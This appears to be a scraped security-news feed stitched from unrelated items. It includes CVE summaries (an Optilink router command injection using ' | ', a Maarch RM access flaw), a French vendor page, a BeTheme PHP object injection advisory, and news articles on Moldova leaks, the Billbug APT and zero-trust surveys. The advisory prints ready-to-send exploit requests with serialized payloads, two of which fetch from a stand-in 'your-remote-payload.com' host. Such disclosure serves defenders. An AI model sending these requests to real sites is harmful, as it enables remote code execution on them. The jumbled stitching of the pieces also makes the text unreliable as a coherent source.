Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2020-23584**

**OPTILINK E-PON "MODEL NO: OP-XT71000N" with "HARDWARE VERSION: V2.2"; & "FIRMWARE VERSION: OP\_V3.3.1-191028"**

Unauthenticated remote code execution on "OPTILINK OP-XT71000N, Hardware Version: V2.2". The issue occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag\_tracert\_admin.asp " in the "PingTest" parameter that leads to command execution.

**TARGET**

/diag\_tracert\_admin.asp

**Attack Vector**

pass arbitrary commands with IP-ADDRESS using " | " to execute commands.

**REGARDS**

Huzaifa Hussain

https://twitter.com/disguised\_noob

https://www.linkedin.com/in/huzaifa-hussain-046791179

CVE-2020-23584: GitHub - huzaifahussain98/CVE-2020-23584: REMOTE CODE EXECUTION

There is a broken access control vulnerability in the Maarch RM 2.8.3 solution. When accessing some specific document (pdf, email) from an archive, a preview is proposed by the application. This preview generates a URL including an md5 hash of the file accessed. The document's URL (https://{url}/tmp/{MD5 hash of the document}) is then accessible without authentication.

**Bienvenue chez Maarch****Nous sommes éditeurs de logiciels ouverts  
spécialisés dans la gestion documentaire****Maarch est un influenceur des usages du numérique  
car nous diffusons largement nos produits.**

**Nos Valeurs**

Depuis notre création en 2004, nous nous sommes fixé des lignes directrices fortes auxquelles nous n'avons jamais cessé de croire :

**Sécurité  
**Suivi des normes ISO 14641-1 et NF Z42-013 , assurance de la non-altération de l’ensemble des ressources.

**Tracabilité  
**Nos logiciels disposent de pistes d’audit fiables et opposables.

**Ouverture  
** Le code de nos logiciels est totalement ouvert, auditable et documenté.

**Innovation**  
Notre équipe R&D travaille au quotidien pour être à la pointe de la technologie.

**Libre & Open Source  
**Logiciels téléchargeables librement et déployés sous licence GNU/GPL v.3

**100 % France  
**Maarch est une entreprise française, du groupe Xelians, implantée en Ile-de-France.

Jean-Louis ERCOLANI  
Fondateur & Directeur Général

**Qui sommes-nous ?**

**Avec 30 employés, Maarch est **une entreprise française à taille humaine située à Nanterre, faisant partie du groupe XELIANS**.**

Depuis 2008, nous avons su faire l’unanimité et séduire de nombreuses **administrations publiques** ainsi que des **grands acteurs du secteur privé.**

L’équipe Maarch est donc composée de spécialistes de l’édition logicielle et de la gestion documentaire en **archivage électronique et gestion du courrier.**

**Nos produits à votre disposition**

Les solutions documentaires pour optimiser le fonctionnement de votre organisation

**Maarch Courrier  
**La solution de gestion de vos courriers professionnels : numérisez, partagez, rédondez, signez et classez.

**Maarch Parapheur**  
Le système de gestion des processus de signature électronique autonome, multimode et interopérable.

**Maarch RM**  
Le système d’archivage électronique pour conserver et exploiter vos ressources numériques en toute conformité.

**Nos services**

Nos équipes vous accompagnent pour faire de chaque projet un véritable succès.

**Support & maintenance**  
Maintenance corrective, évolutive, préventive, adaptative ou réglementaire…

**Intégration**  
Etude préalable  
Ateliers de conception  
Installations SaaS ou OnPremise  
Chaîne de numérisation  
Intégration au SI  
Personnalisation & paramétrage  
Assistance à la recette  
Assistance au démarrage

**Formations**  
Manuels de formation personnalisés  
Formations de formateurs ou d’utilisateurs finaux  
Formation des administrateurs techniques et fonctionnels

**Le code de nos logiciels est totalement ouvert, auditable et documenté.**

Maarch fait le choix du logiciel libre pour **placer l’utilisateur au centre de son processus de développement technico-fonctionnel.** Nous sommes intimement convaincus que la maîtrise parfaite d’un logiciel découle de son ouverture.

De cette façon, notre communauté d’utilisateurs est **totalement libre d’exécuter, de copier, de distribuer, d’étudier, de modifier et d’améliorer nos logiciels,** permettant le développement de fonctionnalités toujours plus proche des usages métiers.

Le caractère libre de nos logiciels est la cerise sur le gâteau : avant tout nous nous efforçons d’en faire les meilleurs dans leur domaine !

Nous utilisons des cookies sur notre site Web pour vous offrir l'expérience la plus pertinente en mémorisant vos préférences et vos visites répétées. En cliquant sur "Accepter tout", vous consentez à l'utilisation de TOUS les cookies. Cependant, vous pouvez visiter "Paramètres des cookies" pour fournir un consentement contrôlé.

CVE-2022-37774: Maarch – Sécurisez vos documents professionnels

After months of meticulous planning, investigators finally move in to catch AlphaBay’s mastermind red-handed. Then the case takes a tragic turn.

The Hunt for the Dark Web’s Biggest Kingpin, Part 5: Takedown

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

The Spacer WordPress plugin before 3.0.7 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3618

Plus: Google’s location snooping ends in a $391 million settlement, Russian code sneaks into US government apps, and the World Cup apps set off alarms.

It was a truly wild week in the tech industry as new details emerged about the FTX cryptocurrency exchange's collapse and Elon Musk drove an ever-increasing number of Twitter employees out of the company. Cryptocurrency tracers have been scrambling to understand what happened to nearly half a billion dollars worth of cryptocurrency that was pulled out of FTX last weekend. It seems that some of it may have been seized by government authorities in the Bahamas, but the mystery is still unraveling. 

Meanwhile, the wheels have increasingly been coming off the bus at Twitter. Earlier this week, for example, some users weren't receiving vital two-factor authentication codes sent over SMS, and it's unclear whether the problem has been fully resolved. With its staffing shortages and so much upheaval, we took a look at what the impacts would be if Twitter suffered a massive data breach or another major security attack in this precarious moment.

New research indicates that telehealth sites too often put addiction patient data at risk, with tracking tech lurking on substance-abuse-focused websites. And we've got part four in the series “The Hunt for the Dark Web’s Biggest Kingpin,” which chronicles the rise and fall of dark web marketplace AlphaBay. This installment tells how law enforcement agents in the Dutch National High-Tech Crime Unit took over and ran the dark web marketplace Hansa and follows US and Thai police as they were closing in on AlphaBay's kingpin, Alpha02, on the brink of attempting a dramatic arrest.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

A significant hack-and-leak operation in Moldova has released alleged Telegram correspondence of at least two politicians, leading to scandal and allegations of corruption. The site, called “Moldova Leaks,” has also threatened to release more data on government officials and politicians. The site published alleged messages from Moldova's minister of justice, Sergiu Litvinenco, and defense and national security adviser to the president Dorin Recean in the past two weeks. Some of the conversations imply that other Moldovan officials have won rigged elections or have been installed improperly in their positions, and the leaks particularly seem targeted at undermining anti-corruption officials. Moldova's pro-Russian political opposition has been quick to spread allegations based on the leaks that Litvinenco, Recean, and others must be removed from office. 

The Moldovan Justice Ministry said the leaked data is stolen, but it added that some of it has been manipulated. Litvinenco and other officials in Moldova's government have said that Russia is behind the operation. "The purpose of this fake is to divert the public's attention from the real problems faced by criminal groups in the Republic of Moldova and their connections with foreign services," Litvinenco wrote on Facebook. At the end of October, _The Washington Post_ reported on efforts by Russia's FSB security agency to undermine Moldova's pro-European government.

Google will pay a total of $391.5 million to 40 US states following an investigation related to the tech giant's user location tracking practices. The probe, a collaboration between state attorneys general, looked at whether Google had deceived users and obfuscated its location-tracking activities. “Consumers thought they had turned off their location tracking features on Google, but the company continued to secretly record their movements and use that information for advertisers,” Oregon attorney general Ellen Rosenblum told _The Washington Post_. "We settled an investigation with 40 US state attorneys general based on outdated product policies that we changed years ago,” Google wrote in a blog post about the agreement on Monday. “As well as a financial settlement, we will be making updates in the coming months to provide even greater controls and transparency over location data.”

Thousands of mobile apps in the Google Play and Apple App Store include code modules from a company called Pushwoosh that claims to be based in Washington, DC, but that Reuters reports is actually based in Russia. The Centers for Disease Control and Prevention incorporated Pushwoosh code into seven of its public apps and removed the service after learning of Reuters' findings. The CDC said that it had been misled about where Pushwoosh was headquartered. In March, the US Army also removed an app used by soldiers at a prominent US combat training base because it incorporated Pushwoosh code. In marketing materials and US regulatory filings, the company claims to be based in California, Maryland, or DC, but it actually pays taxes in Russia and is headquartered in Novosibirsk in Siberia. The company apparently had roughly 40 employees and reported revenue of 143,270,000 rubles (about $2.4 million) in 2021. Though it is unclear if Pushwoosh ever abused its position in apps distributed in the US or elsewhere, the Russian government has a track record of conducting “software supply chain” attacks for intelligence gathering as well as destructive attacks on its enemies.

Data and privacy regulators in Norway, France, and Germany have all warned that World Cup attendees should not download Qatar’s two World Cup apps or should do so on a wiped device if necessary. Officials warn that the apps are invasive, collecting significantly more data than they should and more than they claim to in their privacy policies. “One of the apps collects data on whether and with which number a telephone call is made,” Germany’s data protection commission said in an alert this week. “The other app actively prevents the device on which it is installed from going into sleep mode. It is also obvious that the data used by the apps not only remain locally on the device but are also transmitted to a central server.” World Cup events begin this weekend.

A Destabilizing Hack-and-Leak Operation Hits Moldova

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 11 and Nov. 18. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for November 11 to 18

Researchers find current data protections strategies are failing to get the job done, and IT leaders are concerned, while a lack of qualified IT security talent hampers cyber-defense initiatives.

Organizations are struggling with mounting data losses, increased downtime, and rising recovery costs due to cyberattacks — to the tune of $1.06 million in costs per incident. Meanwhile, IT security staffs are stalled on getting defenses up to speed.

That's according to the 2022 Dell Global Data Protection Index (GDPI) survey of 1,000 IT decision-makers across 15 countries and 14 industries, which found that organizations that experienced disruption have also suffered an average of 2TB data loss and 19 hours of downtime. 

Most respondents (67%) said they lack confidence that their existing data protection measures are sufficient to cope with malware and ransomware threats. A full 63% said they are not very confident that all business-critical data can be reliably recovered in the event of a destructive cyberattack.

Their fears seem founded: Nearly half of respondents (48%) experienced a cyberattack in the past 12 months that prevented access to their data (a 23% increase from 2021) — and that's a trend that Colm Keegan, senior consultant for data protection solutions at Dell Technologies, says will likely continue. 

"The growth and increased distribution of data across edge, core data center and multiple public cloud environments are making it exceedingly difficult for IT admins to protect their data," Keegan explains.

On the protection front, most organizations are falling behind; for instance, 91% are aware of or planning to deploy a zero-trust architecture, but only 12% are fully deployed.

And it's not just advanced defense that's lacking: Keegan points out that 69% of respondents stated they simply cannot meet their backup windows to be prepared for a ransomware attack.

**Data Protection Strategies Face Headwinds**

One of the primary reasons data protection strategies are failing is the lack of visibility of where that data resides and what it is — a problem exacerbated by the rapid, ongoing adoption of cloud-native apps and containers. More than three-quarters of survey respondents said there is a lack of common data protection solutions for these newer technologies.

"Seventy-two percent said they are unable to keep up with what their developers are doing in the cloud — it’s basically a blind spot for them," Keegan says.  

Claude Mandy, chief evangelist of data security at Symmetry Systems, a provider of hybrid cloud data security solutions, agrees that a lack of visibility is the primary reason current data-protection strategies fail.

"Organizations simply do not know what data they have, where it is, let alone how it is protected," he says. "Unfortunately, a lot of the data-protection failures are preventable by simply knowing the answers to these questions."

He adds that the problem is worsened by the constant change of data within an organization. From his perspective, the sheer scale and complexity of millions of individual data objects across thousands of data stored in multiple clouds, multiplied by a seemingly infinite combination of roles and permissions for thousands of user and machine identities, would be challenging for chief information security officers (CISOs) to secure even if they were static. They're not, so the situation is even more challenging.

To boot, in a lot of cases, organizations are using multiple data security tools for different silos of information, with no overarching integration between them.

"The billions of objects form over months or years, and change constantly," Mandy says. "This is further exacerbated through continuous data flows, privilege creep, data sprawl, and organizational churn, resulting in \[visibility\] to data that is far from ideal."

**Zero-Trust Implementation Lags, Despite Interest**

Zero trust is growing in popularity in enterprise security because not trusting users by default works well to reduce risk. Indeed, virtually all the GDPI respondents indicated they intend to implement zero trust into their environments at some point.

However, actual deployment is not happening at a rapid pace — as mentioned, only 12% of respondents indicated they have fully deployed at zero-trust architecture into their environments. According to researchers, the main problem is a critical shortfall in IT skills, particularly as it relates to cyber recovery and data protection.

Widely reported shortages of trained cybersecurity professionals are driving the industry to try to come up with some with creative recruiting and training solutions, but just 65 cybersecurity professionals are in the workforce for every 100 available jobs, a recent study shows.

"If you don’t have cybersecurity professionals on staff, it’s virtually impossible to make progress on deploying a zero-trust framework, unless, of course, you rely on partners to help you get there," Keegan says. "Now consider the demand for these resources in the market. Like supply chain constraints, demand is high, and the supply is low."

Patrick Tiquet, vice president of security and architecture at Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, says that zero-trust management can be challenging even with staff on board.

"Implementation of \[zero trust\] is currently a common data-protection strategy," he explains. "However, for \[zero trust\] to be effective, access and roles must first be configured correctly."

This means ensuring the right people have access to the right data and resources within the zero-trust architecture. Roles must be implemented that are adequately scoped to protect the data that role can access — and correctly configuring access to data just one time ("set it and forget it," in other words) is not enough.

"The organization must maintain and manage data access through the lifecycle of the data, and as the organization grows," Tiquet adds. "Organizations must make sure that, as teams grow and change, the access given to a specific role is still appropriate."

**Vendor Consolidation on the To-Do List**

Keegan says it’s likely there will be some retooling at organizations in terms of platforms — many survey respondents (85%) said they believe they would see a benefit through reducing the number of data protection vendors they work with.

"The research tends to support this sentiment," he adds. "For example, those using a single data protection vendor had far fewer incidents of data loss than those using multiple vendors."

Likewise, the cost of data loss incidents resulting from a cyber attack was approximately 34% higher for those organizations working with multiple data protection vendors than those using a single vendor, according to the survey.

John Bambenek, principal threat hunter at Netenrich, a security and operations analytics software-as-a-service (SaaS) company, says the current spate of M&A and consolidation in the cybersecurity market speaks to those drivers — but warns that vendors trying to be all things to all security problems has its own downsides.

"The larger tech firms get, the less ability they have to innovate and solve problems leading to opportunities for new vendors to step in with new solutions," he explains. "It's \[a cycle\] we see of M&A frenzy and stagnation, then new companies enter to innovate — and more M&A."

Keegan, meanwhile, says he is hearing calls in the analyst community that organizations need to consider shifting their investments from cybersecurity prevention to resiliency.

"This means accepting the inevitability that security breaches will occur," he notes. "Moreover, companies need to have a plan that enables them to recover their critical data and business applications in a timely manner to meet their service level objectives."

Zero-Trust Initiatives Stall, as Cyberattack Costs Rocket to $1M per Incident

Access to digital certificates would allow the Chinese-speaking espionage group to sign its custom malware and skate by security scanners.

The state-sponsored cyberattack group known as Billbug managed to compromise a digital certificate authority (CA) as part of an wide-ranging espionage campaign that stretched back to March — a concerning development in the advanced persistent threat (APT) playbook, researchers warn.

Digital certificates are files that are used to sign software as valid, and verify the identity of a device or user to enable encrypted connections. As such, a CA compromise could lead to a legion of stealthy follow-on attacks.

"The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates, they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines," according to a report this week from Symantec. "It could also potentially use compromised certificates to intercept HTTPS traffic."

"This is potentially very dangerous," the researchers noted.

Others concur. 

“Certificate authorities are one of the most important elements of maintaining security in today’s digital world," Chris Hickman, CSO at Keyfactor, tells Dark Reading. "Much like a driver’s license or passport, digital certificates contain information about an individual or entity and are used to verify the authenticity of websites, devices, or organizations, ensuring an individual user that the entity that they’re communicating with online can be trusted. Think of this as the difference between issuing a real ID rather than a fake one — real IDs will always have some characteristics that cannot be replicated in a fake ID. The same holds true with certificates, which is why this dangerous.”

**An Ongoing Spate of Cyber-Compromises**

Billbug (aka Lotus Blossom or Thrip) is a China-based espionage group that mainly targets victims in Southeast Asia. It's known for big-game hunting — i.e., going after the secrets held by military organizations, governmental entities, and communications providers. Sometimes it casts a broader net, hinting at darker motivations: In one past instance, it infiltrated an aerospace operator to infect the computers that monitor and control the movements of satellites.

In the latest run of nefarious activity, the APT hit a pantheon of government and defense agencies throughout Asia, in one case infesting "a large number of machines" on a government network with its custom malware.

"This campaign was ongoing from at least March 2022 to September 2022, and it is possible this activity may be ongoing," says Brigid O Gorman, senior intelligence analyst at Symantec Threat Hunter Team. "Billbug is a long-established threat group that has carried out multiple campaigns over the years. It is possible that this activity could extend to additional organizations or geographies, though Symantec has no evidence of that at the moment."

**A Familiar Approach to Cyberattacks**

At those targets as well as at the CA, the initial access vector has been the exploitation of vulnerable, public-facing applications. After gaining the ability to execute code, the threat actors go on to install their known, custom Hannotog or Sagerunex backdoors before burrowing deeper into networks.

For the later kill-chain stages, Billbug attackers use multiple living-off-the-land binaries (LoLBins), such as AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Tracert, Winmail, and WinRAR, according to Symantec's report.

These legitimate tools can be abused for various doppelganger uses, such as querying Active Directory to map a network, ZIP-ing files for exfiltration, uncovering paths between endpoints, scanning NetBIOS and ports, and installing browser root certificates — not to mention downloading additional malware.

The custom backdoors combined with dual-use tools is a familiar footprint, having been used by the APT in the past. But the lack of concern about public exposure is par for the course for the group.

"It's notable that Billbug appears to be undeterred by the possibility of having this activity attributed to it, with it reusing tools that have been linked to the group in the past," says Gorman.

She adds, "The group's heavy use of living off the land and dual-use tools is also notable, and underlines the need for organizations to have in place security products that can not only detect malware, but can also recognize if legitimate tools are potentially being used in a suspicious or malicious manner."

Symantec has notified the unnamed CA in question to inform it of the activity, but Gorman declined to offer further details as to its response or remediation efforts.

While there's no indication so far that the group was able to go on to compromise actual digital certificates, the researcher advises, "Enterprises should be aware that malware could be signed with valid certificates if threat actors are able to achieve access to cert authorities."

In general, organizations should adopt a defense-in-depth strategy, using multiple detection, protection, and hardening technologies to mitigate risk at each point of a potential attack chain, she says.

"Symantec would also advise implementing proper audit and control of administrative account usage," Gorman notes. "We'd also suggest creating profiles of usage for admin tools as many of these tools are used by attackers to move laterally undetected through a network. Across the board, multifactor authentication (MFA) can help limit the usefulness of compromised credentials."

China-Based Billbug APT Infiltrates Certificate Authority

According to a recent survey, 90% of CISOs running teams in small to medium-sized enterprises (SMEs) use a managed detection and response (MDR) service. That’s a 53% increase from last year. 
Why the dramatic shift to MDR?
CISOs at organizations of any size, but especially SMEs, are realizing that the threat landscape and the way we do cybersecurity are among the many things that will never look

According to a recent survey, 90% of CISOs running teams in small to medium-sized enterprises (SMEs) use a managed detection and response (MDR) service. That's a 53% increase from last year.

**Why the dramatic shift to MDR?**

CISOs at organizations of any size, but especially SMEs, are realizing that the threat landscape and the way we do cybersecurity are among the many things that will never look the same in a post-2020 world.

The increase in the number of sophisticated attacks, the heavy reliance on the cloud, limited resources and budgets (exacerbated by economic uncertainty), and a growing skills gap are all major contributors to why having an MDR service to support security operations is becoming a necessity.

Beyond that, there are a number of reasons for why incorporating an MDR service into your security strategy can provide exceptional value that even the people who are tightening your budget at your organization can't deny.

Here are just seven reasons why you (yes, you – the CISO or Security Lead of an SME) should consider searching for an MDR provider:

1.  **Get time back by having someone else handle alert monitoring for your org's environment.** Cyberattacks can strike anytime, day or night, even weekends and holidays (who are we kidding – _especially_ on holidays). With an MDR service, your team can rest easy while skilled security experts remain on watch, ready to respond to suspicious activity. MDR services often provide 24/7 alert monitoring so attackers don't slip through the cracks during off hours.
2.  **Benefit from tools and techniques you don't have in-house.** MDR providers use highly accurate, continuously updated security tools and techniques to identify potential threats on your behalf. There's no need for you to worry about product updates or patches.
3.  **Get deep domain knowledge and the latest threat intelligence without making a single hire.** Your security capabilities are augmented by the provider's experts, who are experienced at detection and remediation while staying current on the latest threat trends and techniques. Beyond their detection and response duties, the provider can offer support for inquiries and even remediation recommendations
4.  **Remediate threats before they impact your org.** If a malicious file slips into your environment (like malware embedded in an emailed file or deliberately introduced by a network insider), it's critical to identify it, investigate the forensics, and eradicate the threat as quickly as possible. Your MDR provider can establish automated remediation playbooks to ensure the threat is isolated and removed, including identifying any lateral movement or child processes initiated by the malware.
5.  **Have better control over your response strategy.** The best way to respond to an incident isn't always clear-cut. By partnering with an MDR provider – whether you collaborate with them throughout an incident or let them carry the ball – you benefit from their expertise and guidance.
6.  **Bolster your security with proactive hunting for hidden threats.** Sophisticated attacks sometimes find their way past even the most proficient defenses. Some MDR providers offer rigorous hunting capabilities to root out malicious files and other non-remediated threats within an organization's network.
7.  **Counteract staffing shortages and brain drain.** Even if you have the budget to grow your security team, chances are you have struggled to fill open positions. It's a challenge facing orgs worldwide, with no end in sight. Fortunately, your MDR provider can fill your security gaps, whether they're short or long term. You can stop worrying about training a rotating door of analysts who take institutional knowledge with them each time.

Not sure what kind of MDR service is right for you? Check out Cynet's article, _MDR Services: Choosing the Best Option for You_, for some helpful guidance.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#acer